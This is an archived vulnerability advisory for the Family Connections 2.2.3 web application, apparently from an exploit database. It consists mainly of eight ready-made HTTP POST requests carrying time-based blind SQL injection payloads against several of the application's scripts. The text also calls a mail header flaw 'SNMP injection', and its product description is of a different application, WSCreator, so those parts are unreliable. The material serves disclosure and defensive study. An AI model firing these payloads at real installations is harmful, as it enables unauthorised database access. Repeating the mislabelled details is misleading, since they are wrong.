header-logo
Suggest Exploit
vendor:
Family Connections
by:
Salvatore Fresta aka Drosophila
7.5
CVSS
HIGH
Multiple Blind SQL Injection, Multiple SNMP Injection
89, 200
CWE
Product Name: Family Connections
Affected Version From: 2.2.2003
Affected Version To: 2.2.2003
Patch Exists: NO
Related CWE:
CPE: a:family_connections:family_connections:2.2.3
Metasploit:
Other Scripts:
Platforms Tested:
2010

Family Connections 2.2.3 Multiple Remote Vulnerabilities

The Family Connections version 2.2.3 is affected by multiple vulnerabilities, including multiple blind SQL injection and multiple SNMP injection. The blind SQL injection vulnerability exists in the numeric fields, which are not properly sanitized. The SNMP injection vulnerability allows injecting arbitrary SNMP headers by improperly sanitizing the parameters passed to the mail() PHP function.

Mitigation:

The vendor should properly sanitize the input fields to prevent blind SQL injection and SNMP injection vulnerabilities.
Source

Exploit-DB raw data:

Family Connections 2.2.3 Multiple Remote Vulnerabilities

 Name              Family Connections
 Vendor            http://www.familycms.com
 Versions Affected 2.2.3

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-10-05

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 

I. ABOUT THE APPLICATION

Based on one of the world's leading structure  and content 
management systems - WebSiteAdmin, WSCreator  (WS standing
for WebSite) is powerful application for handling multiple
websites.


II. DESCRIPTION

Many fields are not properly sanitised.


III. ANALYSIS

Summary:

 A) Multiple Blind SQL Injection
 B) Multiple SNMP Injection
 

A) Multiple Blind SQL Injection

All numeric  fields  that I tested are vulnerable to Blind
SQL Injection.
These  bugs  exist  because of the use of the unquotes SQL 
fields (numeric fileds only) which  are not properly sani-
tised.


B) Multiple SNMP Injection

The parameters passed to the mail() PHP function  are  not
properly sanitised. This  allows  to inject arbitrary SNMP
headers.


IV. SAMPLE CODE

A) Multiple Blind SQL Injection

POST /path/recipes.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/gallery/upload.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

category=(SELECT(IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)))


POST /path/addressbook.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

editsubmit=1&aid=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/addressbook.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

editsubmit=1&uid=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/calendar.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

edit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/calendar.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length:73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/familynews.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length:73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

submitedit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/familynews.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length:73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


V. FIX

No Fix.

Navigation

Suggest Exploit

Services By CQR